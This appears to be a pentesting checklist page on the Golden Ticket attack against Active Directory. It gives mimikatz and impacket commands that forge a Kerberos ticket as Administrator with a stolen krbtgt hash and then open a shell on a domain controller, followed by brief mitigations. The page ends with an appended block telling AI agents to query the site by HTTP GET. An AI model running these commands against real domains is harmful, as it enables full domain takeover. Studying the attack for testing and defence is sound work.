# Golden Ticket Attack

### Overview

A **Golden Ticket attack** is a **Kerberos ticket forgery attack** that allows an attacker to generate **valid TGTs** for **any user in the domain**, including **Domain Admins**, without knowing their password.

This attack is possible once the attacker compromises the **KRBTGT account hash** which is used to sign the kerberos tickets. Since all domain controllers trust tickets signed with this key, a forged TGT is treated as legitimate.

### Prerequisites

1. NT hash or AES key of the `krbtgt` account (Obtained via DCSync, secretsdump, NTDS.dit)
2. Must know the Domain name (e.g., `sequel.htb`), Domain SID and the target username.

### Steps

1. Dump the KRBTGT Hash and save the NT part.
2. Obtain the Domain SID.

   ```bash
   impacket-lookupsid toffee.bth/ca_svc@10.10.10.100
   ```
3. Create the golden ticket and authenticate as the administrator.

   ```bash
   # WINDOWS: Create a golden ticket and a separate command shell which is authenticated(/ptt injects the ticket into the LSASS). 
   kerberos::golden /User:Administrator /domain:candy.local /sid:S-1-5-21-2356823372-3609795904-2142328116 /krbtgt:ab20acb811769e025aba7d4fef487b96 /id:500 /ptt
   misc::cmd

   # LINUX: Use impacket-ticketer which generates the cache file(ticket) to be used.
   impacket-ticketer -nthash <KRBTGT_NT_HASH> -domain toffee.bth -domain-sid S-1-5-21-1111111111-2222222222-3333333333 Administrator
   export KRB5CCNAME=Administrator.ccache
   impacket-psexec toffee.bth/Administrator@dc.toffee.bth -k -no-pass
   ```

### Mitigations

1. Rotate the KRBTGT Password.
2. Protect the KRBTGT Account by limiting access to DCSync rights, Domain Admins and Backup Operators.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/domain-takeover/golden-ticket-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.